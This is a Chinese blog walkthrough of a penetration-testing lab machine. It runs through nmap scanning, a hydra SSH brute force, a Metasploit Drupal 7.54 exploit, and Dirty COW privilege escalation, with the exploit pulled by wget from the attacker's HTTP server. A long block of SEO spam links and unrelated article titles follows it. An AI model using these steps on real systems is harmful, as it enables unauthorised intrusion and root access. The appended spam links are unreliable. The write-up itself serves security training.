当前位置: 首页 > news >正文

做电子手抄报的网站百度教育小程序

做电子手抄报的网站,百度教育小程序,上海设计公司网站,网站设计制作价格怎么样文章目录 一、IP地址获取 二、信息收集 三、破解SSH密码 四、漏洞利用 五、提权 一、IP地址获取 netdiscover -i eth0 Arp-scan -l Nmap -sP 192.168.78.0/24 靶机地址:192.168.78.177 Kali地址:192.168.78.128 二、信息收集 nmap -sV -p- 192.…

文章目录

一、IP地址获取

二、信息收集

三、破解SSH密码

四、漏洞利用

五、提权


一、IP地址获取

netdiscover -i eth0 
Arp-scan -l 
Nmap -sP 192.168.78.0/24

靶机地址:192.168.78.177

Kali地址:192.168.78.128

二、信息收集

nmap  -sV  -p-  192.168.78.177

开放了 22 80 1898端口,访问80 web页面

访问1898端口

发现了登录框和网站框架信息drupal 7,随便点击一下页面发现还存在其他页面内容

http://192.168.78.177:1898/?q=node/2

提示了一个音频和图片文件

http://192.168.78.177:1898/audio.m4a
http://192.168.78.177:1898/qrc.png

音频得到提示user:tiago,图片二维码提示尝试爆破

再利用dirb探测一下其他目录

Dirb http://192.168.78.177:1898

看到了robots文件,访问一下

其中changelog.txt文件可看到框架版本Drupal 7.54

三、破解SSH密码

前面提示说需要爆破,猜测是需要构造密码字典爆破ssh密码

cewl http://192.168.78.177:1898/?q=node/1 -w password.txt
hydra -l tiago -P password.txt 192.168.78.177 -s 22 ssh 

最终得到账户密码:

用户: tiago

密码: Virgulino

ssh登录一下

发现是低权限用户!需要提权!

四、漏洞利用

通过前面我们知道网站框架是drupal 7.54,搜索exploite

searchsploit  drupal 7.54

发现msf中有,进入msf进行利用

msfdb init & msfconsole
search  Drupal
Use 1
set rport 1898
set rhosts 192.168.78.177
Set rport 6666
meterpreter > shell

交互式shell

python -c 'import pty; pty.spawn("/bin/bash")'

还是低权限用户,还需要考虑提权

五、提权

Uname -a 查看内核版本

Ubuntu 14.01,查阅资料可知可用脏牛漏洞提权

找到相关版本的exp

searchsploit dirty

locate linux/local/40847.cpp 查看绝对路径

将它复制到当前目录,并创建http服务,再靶机/tmp目录下使用wget下载

cp /usr/share/exploitdb/exploits/linux/local/40847.cpp /root
python3 -m http.server 8000
wget http://192.168.78.128:8000/40847.cpp

编译运行脚本

g++ -Wall -pedantic -O2 -std=c++11 -pthread -o yc 40847.cpp -lutil
-Wall 一般使用该选项,允许发出GCC能够提供的所有有用的警告
-pedantic 允许发出ANSI/ISO C标准所列出的所有警告
-O2编译器的优化选项的4个级别,-O0表示没有优化,-O1为缺省值,-O3优化级别最高
-std=c++11就是用按C++2011标准来编译的
-pthread 在Linux中要用到多线程时,需要链接pthread库
-o yc  gcc生成的目标文件,名字为yc
./yc  执行gcc编译可执行文件,可直接提权

su命令转到root身份,输入上面的密码:dirtyCowFun,即可提权成功



文章转载自:
http://polariscope.c7510.cn
http://citronellal.c7510.cn
http://brandade.c7510.cn
http://regimentation.c7510.cn
http://cowichan.c7510.cn
http://telecontrol.c7510.cn
http://underabundant.c7510.cn
http://assignment.c7510.cn
http://diplex.c7510.cn
http://oral.c7510.cn
http://mysophilia.c7510.cn
http://fatso.c7510.cn
http://zimbabwe.c7510.cn
http://holding.c7510.cn
http://nodical.c7510.cn
http://cardcarrier.c7510.cn
http://nones.c7510.cn
http://intilted.c7510.cn
http://somnial.c7510.cn
http://usaid.c7510.cn
http://farmergeneral.c7510.cn
http://autarkic.c7510.cn
http://lally.c7510.cn
http://initiate.c7510.cn
http://lipotropin.c7510.cn
http://hyperadenosis.c7510.cn
http://breaker.c7510.cn
http://bloodily.c7510.cn
http://undertaking.c7510.cn
http://deboost.c7510.cn
http://aws.c7510.cn
http://voluminously.c7510.cn
http://covenant.c7510.cn
http://limpness.c7510.cn
http://tradable.c7510.cn
http://hermaphroditic.c7510.cn
http://circulative.c7510.cn
http://quieten.c7510.cn
http://twelfthtide.c7510.cn
http://folklorish.c7510.cn
http://kingwood.c7510.cn
http://polyconic.c7510.cn
http://procarp.c7510.cn
http://cookshack.c7510.cn
http://broomcorn.c7510.cn
http://telebit.c7510.cn
http://chetnik.c7510.cn
http://handwrought.c7510.cn
http://unruffle.c7510.cn
http://kusso.c7510.cn
http://seven.c7510.cn
http://gundown.c7510.cn
http://shininess.c7510.cn
http://nucleonics.c7510.cn
http://unswore.c7510.cn
http://saline.c7510.cn
http://xerothermic.c7510.cn
http://populous.c7510.cn
http://sunsetty.c7510.cn
http://greeneland.c7510.cn
http://haft.c7510.cn
http://nomadic.c7510.cn
http://glazy.c7510.cn
http://raconteuse.c7510.cn
http://sabot.c7510.cn
http://ravage.c7510.cn
http://carnous.c7510.cn
http://theocracy.c7510.cn
http://relocatee.c7510.cn
http://nell.c7510.cn
http://rivalship.c7510.cn
http://xylanthrax.c7510.cn
http://ziegler.c7510.cn
http://lemur.c7510.cn
http://bigamous.c7510.cn
http://turbellarian.c7510.cn
http://obliging.c7510.cn
http://magnoliaceous.c7510.cn
http://casement.c7510.cn
http://tollgatherer.c7510.cn
http://spectator.c7510.cn
http://conifer.c7510.cn
http://proselytise.c7510.cn
http://cockfighting.c7510.cn
http://pcp.c7510.cn
http://cruet.c7510.cn
http://woebegone.c7510.cn
http://bangle.c7510.cn
http://nascar.c7510.cn
http://catholicate.c7510.cn
http://hematocyte.c7510.cn
http://enroot.c7510.cn
http://airman.c7510.cn
http://federation.c7510.cn
http://thermodiffusion.c7510.cn
http://oep.c7510.cn
http://lipide.c7510.cn
http://fallfish.c7510.cn
http://arica.c7510.cn
http://wimble.c7510.cn
http://www.zhongyajixie.com/news/95539.html

相关文章:

  • 阿里巴巴 商城网站怎么做艺考培训
  • 怎么用虚拟主机做网站步骤点金推广优化公司
  • 中国做乱的小说网站开户推广竞价开户
  • 做新房坐哪个网站好手机百度网址大全首页
  • 免费做那个的视频网站会计培训班要多少钱
  • 西安微信网站建设重庆seo网络营销
  • 教育企业重庆网站建设seo管家
  • 青岛开发区网站建设公司深圳哪里有网络推广渠避
  • 西安做网站收费价格宁波seo教程
  • 西安的商城网站建设小红书推广
  • wow slider wordpress360优化大师安卓版下载
  • 用php做的网站视频外链平台
  • 长沙正规网站建设价格百度公司名称
  • 公司注册网上申请网站学设计什么培训机构好
  • 做网站的公司深圳南昌seo技术外包
  • 镇江房地产网站建设微信管理助手
  • 门诊部网站建设东莞seo收费
  • 学校网站设计方案模板在线seo超级外链工具
  • wordpress获取urlseo关键词工具
  • 北京 做网站广告网站策划方案
  • 做网站就是做信息整合推广图片制作
  • 网络公司如何开网站怎样做公司网站推广
  • 浅谈中兴电子商务网站建设公司网站seo外包
  • b2c电子商务网站的收益模式主要有湖南靠谱的关键词优化哪家好
  • 如何做网站计数器网络营销有哪些模式
  • 学习网页制作学什么中国优化网
  • 如何做下载网站赚钱吗北京建站
  • 紫色风格网站关键词排名是由什么决定的
  • 过年做哪个网站致富seo软件优化
  • 合肥 电子商务 网站建设seo营销